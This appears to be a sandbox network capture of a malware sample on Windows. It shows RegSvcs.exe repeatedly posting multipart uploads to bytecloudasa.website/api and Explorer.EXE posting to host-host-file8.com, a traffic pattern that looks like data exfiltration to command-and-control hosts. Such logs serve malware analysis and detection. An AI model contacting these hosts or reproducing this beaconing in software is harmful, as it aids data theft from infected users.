Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=0g787p6h8qpmdgsqm1fiifu6d5; expires=Sat, 03 Feb 2024 11:22:58 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:19 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aQYwoSnRMQf1YDCXF00U5kLZ4evwqId7X%2FO8Z3jZLN5G8JPLxwtT42boBxBO84D7a3HAC4%2BBifv1TJpMkixnYGI54ZF76oGQJd9ZHQaz%2FGwmqlPM8ZCBDxoneXu8%2BMhuRlKJzQdHwg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409ff708766612-AMS
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

104.21.61.162

bytecloudasa.website

IN A

172.67.212.39
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=mj22jvjn6apsb1m8qald8pi8a1; expires=Sat, 03 Feb 2024 11:23:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fy0Su2Ttkk0vq7zvrHVpVS%2FYWMGozJHWC%2F5uc8MvF2C%2FTXAo%2B7D%2BbTu5ZxvYRqbnYffLue9BLNyM5EFahWSqYd77Hsxw49%2BIYL8PZPxEgMU7D66bCX8pMCHp%2FUuZYWQ9v4abzeRz%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a0040ba40b7f-AMS
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
POST

http://host-host-file8.com/

Explorer.EXE

Remote address:

194.169.175.127:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uptahkuc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 282
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Tue, 10 Oct 2023 17:36:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

127.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.175.169.194.in-addr.arpa

IN PTR

Response
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=2n3300nfojr6nbg76l6n61q7l1; expires=Sat, 03 Feb 2024 11:23:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WhGJHUcD2buRtQcefMD4sFiqaaozK%2Fp0WJqwfwiI4N7vPO1N%2BTEjfkRxvQW7F5yt3yv0PFB3AVWtgVaNxprv5MX%2BHPZ0je5kr0%2BXYSQXlJA9Zy18pDJeons7OEYW4shtDw%2FRATVZ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a032fc160ae3-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=tmob6p0sugt6ckj85m7k36l4s5; expires=Sat, 03 Feb 2024 11:23:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ufoxp2Nj5bvmrc%2BBg2n5J6UqKpBL94vUqIexlxTJixR7bBf7xbtD%2FXlL%2FsUBqJJnWtGq8k6%2B%2Bgd4rK%2Fm%2Fz8lcR0sLj69JdePTpWXbyF9KHgGiP1sErCb71shnhmnPWeg6e0%2BNzRSCA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a03e6d4fb7e2-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=okp1oqviquipqlpi63hmq8gag7; expires=Sat, 03 Feb 2024 11:23:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CQcnWH%2FDHWuM9imHvJuNpSAXv%2BGdmMjXsAdZjPqxBnoj2sc9X%2Fll%2B%2FOqSiebGCrwG%2BxFkw%2B36OUytqren7VX2UxHJJXV7lUPFXKJSj%2FZSPQPXj9cOWH50JVxT9793BzQfHiOxsxU6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a03f88da0eaf-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 18478
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=19qjl4nrbfuo3d4j5936nb6slg; expires=Sat, 03 Feb 2024 11:23:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4qzDjBL%2FyIGNE3lNDcvzZQ8d3iN3wkti0LrULK6opxeoRkCV4YhLo8hDvkb7sYw3577zAT2SYJ06LZKGi3sImvEwfwrRwk%2FC5HIEcNhrc4NkvNVMihB6dwLDjwp5XPlb51G66wygoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a042acd8b736-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=0ogpobppeokdq3ddojl3no1brq; expires=Sat, 03 Feb 2024 11:23:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BDv7fn%2FNxTlokkkX%2BWhKCAibsboY5dbbBmte%2B9QrGXHTb900vZAitRhENHuX3LAJwO0TRbpjymi%2BRN1VLhTCqhDmBj2zpNZoTooQ6kig0OTioxQYrHWmJeQ1ZPQC%2B7PjsTog8EEd0w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a0451aa05c40-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=rfhvqgnqmab90o1escgj4qbgu3; expires=Sat, 03 Feb 2024 11:23:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O1pUEzqWYOic9tky2NfEWYPtdL%2BTwb2KLypuamdyhf5dqWvVw1YHs3IgsEavzecdWvNLUK3APCxChKTOWSM6N2LVd%2F%2BVF7yJSjExXcB6dGJX67HDRLrnG2Z11MfymivjV5ydIpIZqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a0463aa20b66-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=48i23p9r2j51sidd81o4unhd7u; expires=Sat, 03 Feb 2024 11:23:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9RAmso5rGaDkuIIo9Oh%2FjKgvlO5TkHoVZF5ggN3BTnhvGZzMUW9W4uMzHqsXoADbXls0lDEUYUXlcLo3wDMXJlL7anpNgHyMZMAFaHiTsrxJimUnj%2BPFVK89sXzbhvh6rFcxRrfRRA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a0478cffb903-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=e13t1b3d2had6panoa40c8p24g; expires=Sat, 03 Feb 2024 11:23:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F6nfeSSakyjF75EmNJfy%2FDyfZ2qE7cJ%2BVcMBP2qmKA7E6IwdwoCaWenpjbkR0KazSn38%2FMINvBV6ILebItjEWTERdJj663zXPmz1qg3pIhgd7lMUgjcU9Hq0kFuqo2f4K5KRnBmsxA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a048cadd66a6-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8ko8p4f4012h5ult8p06mhas98; expires=Sat, 03 Feb 2024 11:23:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4utx%2B124Pjkw%2BzOIyYd95uO31z9ADDmAu4xBPA3MYWL9mTwKioFSZXjH53UndKDXxT2zs9bLpy0o93us2Uso5K%2Biie0DS3VZzV%2BekU7%2Bdws8wRsuW3yxnKzWarpik%2FweOvyr3K2tjw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a04a3e8d0e36-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 17451
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=id2tarije53ven20cqqmen6fcb; expires=Sat, 03 Feb 2024 11:23:11 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:32 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G64ZO8j3NB79HTlelT6V6BKzLNcqS4KVjfj2ul8mabUGz6eNSl4jE1KevDPSpiNT9Q1os4lj5fxR%2B7%2F1a8XhjuxmZMudr%2FTvADj2eDQK9lBRyRntUNS0A4eCdTr9dNlfzoKRzYvU4g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a04d2a87b978-AMS
DNS

84cededc-1d1c-4ccc-9294-7ca1a8edacb8.uuid.cdntokiog.studio

Remote address:

8.8.8.8:53

Request

84cededc-1d1c-4ccc-9294-7ca1a8edacb8.uuid.cdntokiog.studio

IN TXT

Response
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=o9e1ho41atm35hklo9587ir2d0; expires=Sat, 03 Feb 2024 11:23:15 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:36 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aE%2BZjBOnqcAcY0KzCuC%2B8vZw2z9%2Fyuq2rgNG9pyLB%2BhfbWmjhzvxU6gf%2FqjAOtCJ3hFjsnKZ5uaUsQ5DJYajldtlNGfsJ0bwEwi8ZRr3d74rA6iT4Cn1O5il9GIoPyuqPQVrh3zG0A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a063691b06ba-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=4pic1folnd8bf56pci0krtvsq2; expires=Sat, 03 Feb 2024 11:23:16 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:37 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=52Nm7FX15Xyx8zsp3VGTWWldT5go%2FSBf96DltLUz9q7IHAIwiBFaYzU1WQKMlOgYThtJI3722RSlSRCLxzZx%2BlB0r9rj0f%2BupXIskat89AnLJHAy7hLeTiL%2BL2tHATK%2BNeO78ngc1g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8140a0660aae6692-AMS
POST

http://bytecloudasa.website/api

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=6vufri5ltqckm9l5pg28b01b56; expires=Sat, 03 Feb 2024 11:23:16 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:37 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
